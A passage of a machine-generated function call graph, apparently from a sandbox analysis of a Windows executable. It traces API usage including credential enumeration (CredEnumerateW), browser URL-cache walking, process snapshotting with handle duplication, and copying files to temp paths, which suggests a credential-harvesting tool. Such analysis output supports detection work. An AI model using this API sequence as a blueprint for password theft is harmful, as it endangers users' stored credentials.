38090->38087 38090->38089 38092 4448cd 38122 44474a 8 API calls 38092->38122 38094 4448e2 38123 44474a 8 API calls 38094->38123 38096 4448f7 38124 44474a 8 API calls 38096->38124 38098 44490c 38125 44474a 8 API calls 38098->38125 38100 444921 38126 44474a 8 API calls 38100->38126 38102 444936 38127 44474a 8 API calls 38102->38127 38104 44494b 38128 44474a 8 API calls 38104->38128 38106 444960 ??3@YAXPAX 38106->38082 38108 44db70 38107->38108 38109 40d702 memset GetPrivateProfileStringW 38108->38109 38110 40d752 38109->38110 38111 40d75c WritePrivateProfileStringW 38109->38111 38110->38111 38112 40d758 38110->38112 38111->38112 38112->38069 38114 44db70 38113->38114 38115 40da8d memset 38114->38115 38116 40daac LoadStringW 38115->38116 38117 40dac6 38116->38117 38117->38116 38119 40dade 38117->38119 38129 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38117->38129 38119->37892 38120->38090 38121->38092 38122->38094 38123->38096 38124->38098 38125->38100 38126->38102 38127->38104 38128->38106 38129->38117 38140 409b98 GetFileAttributesW 38130->38140 38132 40daea 38133 40db63 38132->38133 38134 40daef wcscpy wcscpy GetPrivateProfileIntW 38132->38134 38133->37893 38141 40d65d GetPrivateProfileStringW 38134->38141 38136 40db3e 38142 40d65d GetPrivateProfileStringW 38136->38142 38138 40db4f 38143 40d65d GetPrivateProfileStringW 38138->38143 38140->38132 38141->38136 38142->38138 38143->38133 38179 40eaff 38144->38179 38148 411ae2 memset 38147->38148 38149 411b8f 38147->38149 38219 409bca GetModuleFileNameW 38148->38219 38161 411a8b 38149->38161 38151 411b0a wcsrchr 38152 411b22 wcscat 38151->38152 38153 411b1f 38151->38153 38220 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38152->38220 38153->38152 38155 411b67 38221 402afb 38155->38221 38159 411b7f 38277 40ea13 SendMessageW memset SendMessageW 38159->38277 38162 402afb 27 API calls 38161->38162 38163 411ac0 38162->38163 38164 4110dc 38163->38164 38165 41113e 38164->38165 38170 4110f0 38164->38170 38302 40969c LoadCursorW SetCursor 38165->38302 38167 411143 38303 4032b4 38167->38303 38321 444a54 38167->38321 38168 4110f7 _wcsicmp 38168->38170 38169 411157 38171 40ada2 _wcsicmp 38169->38171 38170->38165 38170->38168 38324 410c46 10 API calls 38170->38324 38174 411167 38171->38174 38172 4111af 38174->38172 38175 4111a6 qsort 38174->38175 38175->38172 38178->37975 38180 40eb10 38179->38180 38192 40e8e0 38180->38192 38183 40eb6c memcpy memcpy 38184 40ebb7 38183->38184 38184->38183 38185 40ebf2 ??2@YAPAXI ??2@YAPAXI 38184->38185 38188 40d134 16 API calls 38184->38188 38186 40ec2e ??2@YAPAXI 38185->38186 38189 40ec65 38185->38189 38186->38189 38188->38184 38189->38189 38202 40ea7f 38189->38202 38191 402f49 38191->37975 38193 40e8f2 38192->38193 38194 40e8eb ??3@YAXPAX 38192->38194 38195 40e900 38193->38195 38196 40e8f9 ??3@YAXPAX 38193->38196 38194->38193 38197 40e911 38195->38197 38198 40e90a ??3@YAXPAX 38195->38198 38196->38195 38199 40e931 ??2@YAPAXI ??2@YAPAXI 38197->38199 38200 40e921 ??3@YAXPAX 38197->38200 38201 40e92a ??3@YAXPAX 38197->38201 38198->38197 38199->38183 38200->38201 38201->38199 38203 40aa04 free 38202->38203 38204 40ea88 38203->38204 38205 40aa04 free 38204->38205 38206 40ea90 38205->38206 38207 40aa04 free 38206->38207 38208 40ea98 38207->38208 38209 40aa04 free 38208->38209 38210 40eaa0 38209->38210 38211 40a9ce 4 API calls 38210->38211 38212 40eab3 38211->38212 38213 40a9ce 4 API calls 38212->38213 38214 40eabd 38213->38214 38215 40a9ce 4 API calls 38214->38215 38216 40eac7 38215->38216 38217 40a9ce 4 API calls 38216->38217 38218 40ead1 38217->38218 38218->38191 38219->38151 38220->38155 38278 40b2cc 38221->38278 38223 402b0a 38224 40b2cc 27 API calls 38223->38224 38225 402b23 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402b3a 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402b54 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402b6b 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402b82 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402b99 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402bb0 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402bc7 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402bde 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402bf5 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c0c 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402c23 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402c3a 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402c51 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402c68 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402c7f 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402c99 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402cb3 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402cd5 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402cf0 38262->38263 38264 40b2cc 27 API calls 38263->38264 38265 402d0b 38264->38265 38266 40b2cc 27 API calls 38265->38266 38267 402d26 38266->38267 38268 40b2cc 27 API calls 38267->38268 38269 402d3e 38268->38269 38270 40b2cc 27 API calls 38269->38270 38271 402d59 38270->38271 38272 40b2cc 27 API calls 38271->38272 38273 402d78 38272->38273 38274 40b2cc 27 API calls 38273->38274 38275 402d93 38274->38275 38276 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38275->38276 38276->38159 38277->38149 38281 40b58d 38278->38281 38280 40b2d1 38280->38223 38282 40b5a4 GetModuleHandleW FindResourceW 38281->38282 38283 40b62e 38281->38283 38284 40b5c2 LoadResource 38282->38284 38286 40b5e7 38282->38286 38283->38280 38285 40b5d0 SizeofResource LockResource 38284->38285 38284->38286 38285->38286 38286->38283 38294 40afcf 38286->38294 38288 40b608 memcpy 38297 40b4d3 memcpy 38288->38297 38290 40b61e 38298 40b3c1 18 API calls 38290->38298 38292 40b626 38299 40b04b 38292->38299 38295 40b04b ??3@YAXPAX 38294->38295 38296 40afd7 ??2@YAPAXI 38295->38296 38296->38288 38297->38290 38298->38292 38300 40b051 ??3@YAXPAX 38299->38300 38301 40b05f 38299->38301 38300->38301 38301->38283 38302->38167 38304 4032c4 38303->38304 38305 40b633 free 38304->38305 38306 403316 38305->38306 38325 44553b 38306->38325 38310 403480 38523 40368c 15 API calls 38310->38523 38312 403489 38313 40b633 free 38312->38313 38314 403495 38313->38314 38314->38169 38315 4033a9 memset memcpy 38316 4033ec wcscmp 38315->38316 38317 40333c 38315->38317 38316->38317 38317->38310 38317->38315 38317->38316 38521 4028e7 11 API calls 38317->38521 38522 40f508 6 API calls 38317->38522 38319 403421 _wcsicmp 38319->38317 38322 444a64 FreeLibrary 38321->38322 38323 444a83 38321->38323 38322->38323 38323->38169 38324->38170 38326 445548 38325->38326 38327 445599 38326->38327 38524 40c768 38326->38524 38328 4455a8 memset 38327->38328 38335 4457f2 38327->38335 38607 403988 38328->38607 38339 445854 38335->38339 38709 403e2d memset memset memset memset memset 38335->38709 38336 445672 38618 403fbe memset memset memset memset memset 38336->38618 38337 4458bb memset memset 38344 414c2e 16 API calls 38337->38344 38390 4458aa 38339->38390 38732 403c9c memset memset memset memset memset 38339->38732 38340 44557a 38387 44558c 38340->38387 38804 4136c0 CoTaskMemFree 38340->38804 38342 44595e memset memset 38349 414c2e 16 API calls 38342->38349 38343 4455e5 38343->38336 38352 44560f 38343->38352 38345 4458f9 38344->38345 38350 40b2cc 27 API calls 38345->38350 38347 445a00 memset memset 38755 414c2e 38347->38755 38348 445b22 38354 445bca 38348->38354 38355 445b38 memset memset memset 38348->38355 38359 44599c 38349->38359 38360 445909 38350->38360 38364 4087b3 338 API calls 38352->38364 38353 445849 38820 40b1ab free free 38353->38820 38361 445c8b memset memset 38354->38361 38429 445cf0 38354->38429 38365 445bd4 38355->38365 38366 445b98 38355->38366 38369 40b2cc 27 API calls 38359->38369 38370 409d1f 6 API calls 38360->38370 38373 414c2e 16 API calls 38361->38373 38362 445585 38805 41366b FreeLibrary 38362->38805 38363 44589f 38821 40b1ab free free 38363->38821 38371 445621 38364->38371 38379 414c2e 16 API calls 38365->38379 38366->38365 38375 445ba2 38366->38375 38372 4459ac 38369->38372 38383 445919 38370->38383 38806 4454bf 20 API calls 38371->38806 38385 409d1f 6 API calls 38372->38385 38386 445cc9 38373->38386 38893 4099c6 wcslen 38375->38893 38376 4456b2 38808 40b1ab free free 38376->38808 38378 40b2cc 27 API calls 38391 445a4f 38378->38391 38393 445be2 38379->38393 38380 403335 38520 4452e5 45 API calls 38380->38520 38381 445d3d 38413 40b2cc 27 API calls 38381->38413 38382 445d88 memset memset memset 38396 414c2e 16 API calls 38382->38396 38822 409b98 GetFileAttributesW 38383->38822 38384 445823 38384->38353 38395 4087b3 338 API calls 38384->38395 38397 4459bc 38385->38397 38398 409d1f 6 API calls 38386->38398 38591 444b06 38387->38591 38388 445879 38388->38363 38409 4087b3 338 API calls 38388->38409 38390->38337 38414 44594a 38390->38414 38770 409d1f wcslen wcslen 38391->38770 38402 40b2cc 27 API calls 38393->38402 38395->38384 38406 445dde 38396->38406 38889 409b98 GetFileAttributesW 38397->38889 38408 445ce1 38398->38408 38399 445bb3 38896 445403 memset 38399->38896 38400 445680 38400->38376 38641 4087b3 memset 38400->38641 38403 445bf3 38402->38403 38412 409d1f 6 API calls 38403->38412 38404 445928 38404->38414 38823 40b6ef 38404->38823 38415 40b2cc 27 API calls 38406->38415 38913 409b98 GetFileAttributesW 38408->38913 38409->38388 38423 445c07 38412->38423 38424 445d54 _wcsicmp 38413->38424 38414->38342 38428 4459ed 38414->38428 38427 445def 38415->38427 38416 4459cb 38416->38428 38437 40b6ef 252 API calls 38416->38437 38420 40b2cc 27 API calls 38421 445a94 38420->38421 38775 40ae18 38421->38775 38422 44566d 38422->38335 38692 413d4c 38422->38692 38433 445389 258 API calls 38423->38433 38434 445d71 38424->38434 38499 445d67 38424->38499 38426 445665 38807 40b1ab free free 38426->38807 38435 409d1f 6 API calls 38427->38435 38428->38347 38428->38348 38429->38380 38429->38381 38429->38382 38430 445389 258 API calls 38430->38354 38439 445c17 38433->38439 38914 445093 23 API calls 38434->38914 38442 445e03 38435->38442 38437->38428 38438 4456d8 38444 40b2cc 27 API calls 38438->38444 38445 40b2cc 27 API calls 38439->38445 38441 44563c 38441->38426 38447 4087b3 338 API calls 38441->38447 38915 409b98 GetFileAttributesW 38442->38915 38443 40b6ef 252 API calls 38443->38380 38449 4456e2 38444->38449 38450 445c23 38445->38450 38446 445d83 38446->38380 38447->38441 38809 413fa6 _wcsicmp _wcsicmp 38449->38809 38454 409d1f 6 API calls 38450->38454 38452 445e12 38459 445e6b 38452->38459 38465 40b2cc 27 API calls 38452->38465 38457 445c37 38454->38457 38455 445aa1 38458 445b17 38455->38458 38473 445ab2 memset 38455->38473 38486 409d1f 6 API calls 38455->38486 38782 40add4 38455->38782 38787 445389 38455->38787 38796 40ae51 38455->38796 38456 4456eb 38461 4456fd memset memset memset memset 38456->38461 38462 4457ea 38456->38462 38463 445389 258 API calls 38457->38463 38890 40aebe 38458->38890 38917 445093 23 API calls 38459->38917 38810 409c70 wcscpy wcsrchr 38461->38810 38813 413d29 38462->38813 38468 445c47 38463->38468 38469 445e33 38465->38469 38475 40b2cc 27 API calls 38468->38475 38476 409d1f 6 API calls 38469->38476 38471 445e7e 38472 445f67 38471->38472 38481 40b2cc 27 API calls 38472->38481 38477 40b2cc 27 API calls 38473->38477 38479 445c53 38475->38479 38480 445e47 38476->38480 38477->38455 38478 409c70 2 API calls 38482 44577e 38478->38482 38483 409d1f 6 API calls 38479->38483 38916 409b98 GetFileAttributesW 38480->38916 38485 445f73 38481->38485 38487 409c70 2 API calls 38482->38487 38488 445c67 38483->38488 38490 409d1f 6 API calls 38485->38490 38486->38455 38491 44578d 38487->38491 38492 445389 258 API calls 38488->38492 38489 445e56 38489->38459 38495 445e83 memset 38489->38495 38493 445f87 38490->38493 38491->38462 38498 40b2cc 27 API calls 38491->38498 38492->38354 38920 409b98 GetFileAttributesW 38493->38920 38497 40b2cc 27 API calls 38495->38497 38500 445eab 38497->38500 38501 4457a8 38498->38501 38499->38380 38499->38443 38502 409d1f 6 API calls 38500->38502 38503 409d1f 6 API calls 38501->38503 38504 445ebf 38502->38504 38505 4457b8 38503->38505 38506 40ae18 9 API calls 38504->38506 38812 409b98 GetFileAttributesW 38505->38812 38516 445ef5 38506->38516 38508 4457c7 38508->38462 38510 4087b3 338 API calls 38508->38510 38509 40ae51 9 API calls 38509->38516 38510->38462 38511 445f5c 38513 40aebe FindClose 38511->38513 38512 40add4 2 API calls 38512->38516 38513->38472 38514 40b2cc 27 API calls 38514->38516 38515 409d1f 6 API calls 38515->38516 38516->38509 38516->38511 38516->38512 38516->38514 38516->38515 38518 445f3a 38516->38518 38918 409b98 GetFileAttributesW 38516->38918 38919 445093 23 API calls 38518->38919 38520->38317 38521->38319 38522->38317 38523->38312 38525 40c775 38524->38525 38921 40b1ab free free 38525->38921 38527 40c788 38922 40b1ab free free 38527->38922 38529 40c790 38923 40b1ab free free 38529->38923 38531 40c798 38532 40aa04 free 38531->38532 38533 40c7a0 38532->38533 38924 40c274 memset 38533->38924 38538 40a8ab 9 API calls 38539 40c7c3 38538->38539 38540 40a8ab 9 API calls 38539->38540 38541 40c7d0 38540->38541 38953 40c3c3 38541->38953 38545 40c877 38554 40bdb0 38545->38554 38546 40c86c 38995 4053fe 39 API calls 38546->38995 38548 40c7e5 38548->38545 38548->38546 38553 40c634 49 API calls 38548->38553 38978 40a706 38548->38978 38553->38548 39163 404363 38554->39163 38557 40bf5d 39183 40440c 38557->39183 38559 40bdee 38559->38557 38562 40b2cc 27 API calls 38559->38562 38560 40bddf CredEnumerateW 38560->38559 38563 40be02 wcslen 38562->38563 38563->38557 38565 40be1e 38563->38565 38564 40be26 wcsncmp 38564->38565 38565->38557 38565->38564 38568 40be7d memset 38565->38568 38569 40bea7 memcpy 38565->38569 38570 40bf11 wcschr 38565->38570 38571 40b2cc 27 API calls 38565->38571 38573 40bf43 LocalFree 38565->38573 39186 40bd5d 28 API calls 38565->39186 39187 404423 38565->39187 38568->38565 38568->38569 38569->38565 38569->38570 38570->38565 38572 40bef6 _wcsnicmp 38571->38572 38572->38565 38572->38570 38573->38565 38574 4135f7 39200 4135e0 38574->39200 38577 40b2cc 27 API calls 38578 41360d 38577->38578 38579 40a804 8 API calls 38578->38579 38580 413613 38579->38580 38581 41361b 38580->38581 38582 41363e 38580->38582 38583 40b273 27 API calls 38581->38583 38584 4135e0 FreeLibrary 38582->38584 38585 413625 GetProcAddress 38583->38585 38586 413643 38584->38586 38585->38582 38587 413648 38585->38587 38586->38340 38588 413658 38587->38588 38589 4135e0 FreeLibrary 38587->38589 38588->38340 38590 413666 38589->38590 38590->38340 39203 4449b9 38591->39203 38594 444c1f 38594->38327 38595 4449b9 42 API calls 38597 444b4b 38595->38597 38596 444c15 38598 4449b9 42 API calls 38596->38598 38597->38596 39224 444972 GetVersionExW 38597->39224 38598->38594 38600 444b99 memcmp 38605 444b8c 38600->38605 38601 444c0b 39228 444a85 42 API calls 38601->39228 38605->38600 38605->38601 39225 444aa5 42 API calls 38605->39225 39226 40a7a0 GetVersionExW 38605->39226 39227 444a85 42 API calls 38605->39227 38608 40399d 38607->38608 39229 403a16 38608->39229 38610 403a09 39243 40b1ab free free 38610->39243 38612 4039a3 38612->38610 38616 4039f4 38612->38616 39240 40a02c CreateFileW 38612->39240 38613 403a12 wcsrchr 38613->38343 38616->38610 38617 4099c6 2 API calls 38616->38617 38617->38610 38619 414c2e 16 API calls 38618->38619 38620 404048 38619->38620 38621 414c2e 16 API calls 38620->38621 38622 404056 38621->38622 38623 409d1f 6 API calls 38622->38623 38624 404073 38623->38624 38625 409d1f 6 API calls 38624->38625 38626 40408e 38625->38626 38627 409d1f 6 API calls 38626->38627 38628 4040a6 38627->38628 38629 403af5 20 API calls 38628->38629 38630 4040ba 38629->38630 38631 403af5 20 API calls 38630->38631 38632 4040cb 38631->38632 39270 40414f memset 38632->39270 38634 404140 39284 40b1ab free free 38634->39284 38636 4040ec memset 38639 4040e0 38636->38639 38637 404148 38637->38400 38638 4099c6 2 API calls 38638->38639 38639->38634 38639->38636 38639->38638 38640 40a8ab 9 API calls 38639->38640 38640->38639 39297 40a6e6 WideCharToMultiByte 38641->39297 38643 4087ed 39298 4095d9 memset 38643->39298 38646 408953 38646->38400 38647 408809 memset memset memset memset memset 38648 40b2cc 27 API calls 38647->38648 38649 4088a1 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 4088b1 38650->38651 38652 40b2cc 27 API calls 38651->38652 38653 4088c0 38652->38653 38654 409d1f 6 API calls 38653->38654 38655 4088d0 38654->38655 38656 40b2cc 27 API calls 38655->38656 38657 4088df 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 4088ef 38658->38659 38660 40b2cc 27 API calls 38659->38660 38661 4088fe 38660->38661 38662 409d1f 6 API calls 38661->38662 38663 40890e 38662->38663 38664 40b2cc 27 API calls 38663->38664 38665 40891d 38664->38665 38666 409d1f 6 API calls 38665->38666 38667 40892d 38666->38667 39317 409b98 GetFileAttributesW 38667->39317 38669 40893e 38670 408943 38669->38670 38671 408958 38669->38671 39318 407fdf 75 API calls 38670->39318 39319 409b98 GetFileAttributesW 38671->39319 38674 408964 38675 408969 38674->38675 38676 40897b 38674->38676 39320 4082c7 199 API calls 38675->39320 39321 409b98 GetFileAttributesW 38676->39321 38693 40b633 free 38692->38693 38694 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38693->38694 38695 413f00 Process32NextW 38694->38695 38696 413da5 OpenProcess 38695->38696 38697 413f17 CloseHandle 38695->38697 38698 413df3 memset 38696->38698 38703 413eb0 38696->38703 38697->38438 39609 413f27 38698->39609 38700 413ebf free 38700->38703 38701 4099f4 3 API calls 38701->38703 38703->38695 38703->38700 38703->38701 38704 413e37 GetModuleHandleW 38705 413e1f 38704->38705 38706 413e46 GetProcAddress 38704->38706 38705->38704 39614 413959 38705->39614 39630 413ca4 38705->39630 38706->38705 38708 413ea2 CloseHandle 38708->38703 38710 414c2e 16 API calls 38709->38710 38711 403eb7 38710->38711 38712 414c2e 16 API calls 38711->38712 38713 403ec5 38712->38713 38714 409d1f 6 API calls 38713->38714 38715 403ee2 38714->38715 38716 409d1f 6 API calls 38715->38716 38717 403efd 38716->38717 38718 409d1f 6 API calls 38717->38718 38719 403f15 38718->38719 38720 403af5 20 API calls 38719->38720 38721 403f29 38720->38721 38722 403af5 20 API calls 38721->38722 38723 403f3a 38722->38723 38724 40414f 33 API calls 38723->38724 38725 403f4f 38724->38725 38726 403faf 38725->38726 38728 403f5b memset 38725->38728 38730 4099c6 2 API calls 38725->38730 38731 40a8ab 9 API calls 38725->38731 39644 40b1ab free free 38726->39644 38728->38725 38729 403fb7 38729->38384 38730->38725 38731->38725 38733 414c2e 16 API calls 38732->38733 38734 403d26 38733->38734 38735 414c2e 16 API calls 38734->38735 38736 403d34 38735->38736 38737 409d1f 6 API calls 38736->38737 38738 403d51 38737->38738 38739 409d1f 6 API calls 38738->38739 38740 403d6c 38739->38740 38741 409d1f 6 API calls 38740->38741 38742 403d84 38741->38742 38743 403af5 20 API calls 38742->38743 38744 403d98 38743->38744 38745 403af5 20 API calls 38744->38745 38746 403da9 38745->38746 38747 40414f 33 API calls 38746->38747 38748 403dbe 38747->38748 38749 403e1e 38748->38749 38750 403dca memset 38748->38750 38753 4099c6 2 API calls 38748->38753 38754 40a8ab 9 API calls 38748->38754 39645 40b1ab free free 38749->39645 38750->38748 38752 403e26 38752->38388 38753->38748 38754->38748 38756 414b81 9 API calls 38755->38756 38757 414c40 38756->38757 38758 414c73 memset 38757->38758 39646 409cea 38757->39646 38759 414c94 38758->38759 39649 414592 RegOpenKeyExW 38759->39649 38763 414c64 38763->38378 38764 414cc1 38765 414cf4 wcscpy 38764->38765 39650 414bb0 wcscpy 38764->39650 38765->38763 38767 414cd2 39651 4145ac RegQueryValueExW 38767->39651 38769 414ce9 RegCloseKey 38769->38765 38771 409d62 38770->38771 38772 409d43 wcscpy 38770->38772 38771->38420 38773 409719 2 API calls 38772->38773 38774 409d51 wcscat 38773->38774 38774->38771 38776 40aebe FindClose 38775->38776 38777 40ae21 38776->38777 38778 4099c6 2 API calls 38777->38778 38779 40ae35 38778->38779 38780 409d1f 6 API calls 38779->38780 38781 40ae49 38780->38781 38781->38455 38783 40ade0 38782->38783 38784 40ae0f 38782->38784 38783->38784 38785 40ade7 wcscmp 38783->38785 38784->38455 38785->38784 38786 40adfe wcscmp 38785->38786 38786->38784 38788 40ae18 9 API calls 38787->38788 38794 4453c4 38788->38794 38789 40ae51 9 API calls 38789->38794 38790 4453f3 38792 40aebe FindClose 38790->38792 38791 40add4 2 API calls 38791->38794 38793 4453fe 38792->38793 38793->38455 38794->38789 38794->38790 38794->38791 38795 445403 253 API calls 38794->38795 38795->38794 38797 40ae7b FindNextFileW 38796->38797 38798 40ae5c FindFirstFileW 38796->38798 38799 40ae94 38797->38799 38800 40ae8f 38797->38800 38798->38799 38802 40aeb6 38799->38802 38803 409d1f 6 API calls 38799->38803 38801 40aebe FindClose 38800->38801 38801->38799 38802->38455 38803->38802 38804->38362 38805->38387 38806->38441 38807->38422 38808->38422 38809->38456 38811 409c89 38810->38811 38811->38478 38812->38508 38814 413d39 38813->38814 38815 413d2f FreeLibrary 38813->38815 38816 40b633 free 38814->38816 38815->38814 38817 413d42 38816->38817 38818 40b633 free 38817->38818 38819 413d4a 38818->38819 38819->38335 38820->38339 38821->38390 38822->38404 38824 44db70 38823->38824 38825 40b6fc memset 38824->38825 38826 409c70 2 API calls 38825->38826 38827 40b732 wcsrchr 38826->38827 38828 40b743 38827->38828 38829 40b746 memset 38827->38829 38828->38829 38830 40b2cc 27 API calls 38829->38830 38831 40b76f 38830->38831 38832 409d1f 6 API calls 38831->38832 38833 40b783 38832->38833 39652 409b98 GetFileAttributesW 38833->39652 38835 40b792 38836 40b7c2 38835->38836 38837 409c70 2 API calls 38835->38837 39653 40bb98 38836->39653 38839 40b7a5 38837->38839 38841 40b2cc 27 API calls 38839->38841 38844 40b7b2 38841->38844 38842 40b837 CloseHandle 38846 40b83e memset 38842->38846 38843 40b817 39687 409a45 GetTempPathW 38843->39687 38848 409d1f 6 API calls 38844->38848 39686 40a6e6 WideCharToMultiByte 38846->39686 38848->38836 38849 40b827 CopyFileW 38849->38846 38850 40b866 38851 444432 121 API calls 38850->38851 38852 40b879 38851->38852 38853 40bad5 38852->38853 38854 40b273 27 API calls 38852->38854 38855 40baeb 38853->38855 38856 40bade DeleteFileW 38853->38856 38857 40b89a 38854->38857 38858 40b04b ??3@YAXPAX 38855->38858 38856->38855 38859 438552 134 API calls 38857->38859 38860 40baf3 38858->38860 38861 40b8a4 38859->38861 38860->38414 38862 40bacd 38861->38862 38864 4251c4 137 API calls 38861->38864 38863 443d90 111 API calls 38862->38863 38863->38853 38887 40b8b8 38864->38887 38865 40bac6 39699 424f26 123 API calls 38865->39699 38866 40b8bd memset 39690 425413 17 API calls 38866->39690 38869 425413 17 API calls 38869->38887 38872 40a71b MultiByteToWideChar 38872->38887 38873 40a734 MultiByteToWideChar 38873->38887 38876 40b9b5 memcmp 38876->38887 38877 4099c6 2 API calls 38877->38887 38878 404423 37 API calls 38878->38887 38880 40bb3e memset memcpy 39700 40a734 MultiByteToWideChar 38880->39700 38881 4251c4 137 API calls 38881->38887 38884 40bb88 LocalFree 38884->38887 38887->38865 38887->38866 38887->38869 38887->38872 38887->38873 38887->38876 38887->38877 38887->38878 38887->38880 38887->38881 38888 40ba5f memcmp 38887->38888 39691 4253ef 16 API calls 38887->39691 39692 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38887->39692 39693 4253af 17 API calls 38887->39693 39694 4253cf 17 API calls 38887->39694 39695 447280 memset 38887->39695 39696 447960 memset memcpy memcpy memcpy 38887->39696 39697 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38887->39697 39698 447920 memcpy memcpy memcpy 38887->39698 38888->38887 38889->38416 38891 40aed1 38890->38891 38892 40aec7 FindClose 38890->38892 38891->38348 38892->38891 38894 4099d7 38893->38894 38895 4099da memcpy 38893->38895 38894->38895 38895->38399 38897 40b2cc 27 API calls 38896->38897 38898 44543f 38897->38898 38899 409d1f 6 API calls 38898->38899 38900 44544f 38899->38900 39792 409b98 GetFileAttributesW 38900->39792 38902 44545e 38903 445476 38902->38903 38904 40b6ef 252 API calls 38902->38904 38905 40b2cc 27 API calls 38903->38905 38904->38903 38906 445482 38905->38906 38907 409d1f 6 API calls 38906->38907 38908 445492 38907->38908 39793 409b98 GetFileAttributesW 38908->39793 38910 4454a1 38911 4454b9 38910->38911 38912 40b6ef 252 API calls 38910->38912 38911->38430 38912->38911 38913->38429 38914->38446 38915->38452 38916->38489 38917->38471 38918->38516 38919->38516 38920->38499 38921->38527 38922->38529 38923->38531 38925 414c2e 16 API calls 38924->38925 38926 40c2ae 38925->38926 38996 40c1d3 38926->38996 38931 40c3be 38948 40a8ab 38931->38948 38932 40afcf 2 API calls 38933 40c2fd FindFirstUrlCacheEntryW 38932->38933 38934 40c3b6 38933->38934 38935 40c31e wcschr 38933->38935 38936 40b04b ??3@YAXPAX 38934->38936 38937 40c331 38935->38937 38938 40c35e FindNextUrlCacheEntryW 38935->38938 38936->38931 38939 40a8ab 9 API calls 38937->38939 38938->38935 38940 40c373 GetLastError 38938->38940 38943 40c33e wcschr 38939->38943 38941 40c3ad FindCloseUrlCache 38940->38941 38942 40c37e 38940->38942 38941->38934 38944 40afcf 2 API calls 38942->38944 38943->38938 38945 40c34f 38943->38945 38946 40c391 FindNextUrlCacheEntryW 38944->38946 38947 40a8ab 9 API calls 38945->38947 38946->38935 38946->38941 38947->38938 39090 40a97a 38948->39090 38951 40a8cc 38951->38538 38952 40a8d0 7 API calls 38952->38951 39095 40b1ab free free 38953->39095 38955 40c3dd 38956 40b2cc 27 API calls 38955->38956 38957 40c3e7 38956->38957 39096 414592 RegOpenKeyExW 38957->39096 38959 40c3f4 38960 40c50e 38959->38960 38961 40c3ff 38959->38961 38975 405337 38960->38975 38962 40a9ce 4 API calls 38961->38962 38963 40c418 memset 38962->38963 39097 40aa1d 38963->39097 38966 40c471 38968 40c47a _wcsupr 38966->38968 38967 40c505 RegCloseKey 38967->38960 38969 40a8d0 7 API calls 38968->38969 38970 40c498 38969->38970 38971 40a8d0 7 API calls 38970->38971 38972 40c4ac memset 38971->38972 38973 40aa1d 38972->38973 38974 40c4e4 RegEnumValueW 38973->38974 38974->38967 38974->38968 39099 405220 38975->39099 38979 4099c6 2 API calls 38978->38979 38980 40a714 _wcslwr 38979->38980 38981 40c634 38980->38981 39156 405361 38981->39156 38984 40c65c wcslen 39159 4053b6 39 API calls 38984->39159 38985 40c71d wcslen 38985->38548 38987 40c713 39162 4053df 39 API calls 38987->39162 38988 40c677 38988->38987 39160 40538b 39 API calls 38988->39160 38991 40c6a5 38991->38987 38992 40c6a9 memset 38991->38992 38993 40c6d3 38992->38993 39161 40c589 43 API calls 38993->39161 38995->38545 38997 40ae18 9 API calls 38996->38997 39003 40c210 38997->39003 38998 40ae51 9 API calls 38998->39003 38999 40c264 39000 40aebe FindClose 38999->39000 39002 40c26f 39000->39002 39001 40add4 2 API calls 39001->39003 39008 40e5ed memset memset 39002->39008 39003->38998 39003->38999 39003->39001 39004 40c231 _wcsicmp 39003->39004 39005 40c1d3 35 API calls 39003->39005 39004->39003 39006 40c248 39004->39006 39005->39003 39021 40c084 22 API calls 39006->39021 39009 414c2e 16 API calls 39008->39009 39010 40e63f 39009->39010 39011 409d1f 6 API calls 39010->39011 39012 40e658 39011->39012 39022 409b98 GetFileAttributesW 39012->39022 39014 40e667 39015 40e680 39014->39015 39017 409d1f 6 API calls 39014->39017 39023 409b98 GetFileAttributesW 39015->39023 39017->39015 39018 40e68f 39019 40c2d8 39018->39019 39024 40e4b2 39018->39024 39019->38931 39019->38932 39021->39003 39022->39014 39023->39018 39045 40e01e 39024->39045 39026 40e593 39028 40e5b0 39026->39028 39029 40e59c DeleteFileW 39026->39029 39027 40e521 39027->39026 39068 40e175 39027->39068 39030 40b04b ??3@YAXPAX 39028->39030 39029->39028 39031 40e5bb 39030->39031 39033 40e5c4 CloseHandle 39031->39033 39034 40e5cc 39031->39034 39033->39034 39036 40b633 free 39034->39036 39035 40e573 39037 40e584 39035->39037 39038 40e57c CloseHandle 39035->39038 39039 40e5db 39036->39039 39089 40b1ab free free 39037->39089 39038->39037 39042 40b633 free 39039->39042 39041 40e540 39041->39035 39088 40e2ab 30 API calls 39041->39088 39043 40e5e3 39042->39043 39043->39019 39046 406214 22 API calls 39045->39046 39047 40e03c 39046->39047 39048 40e16b 39047->39048 39049 40dd85 74 API calls 39047->39049 39048->39027 39050 40e06b 39049->39050 39050->39048 39051 40afcf ??2@YAPAXI ??3@YAXPAX 39050->39051 39052 40e08d OpenProcess 39051->39052 39053 40e0a4 GetCurrentProcess DuplicateHandle 39052->39053 39057 40e152 39052->39057 39054 40e0d0 GetFileSize 39053->39054 39055 40e14a CloseHandle 39053->39055 39058 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39054->39058 39055->39057 39056 40e160 39060 40b04b ??3@YAXPAX 39056->39060 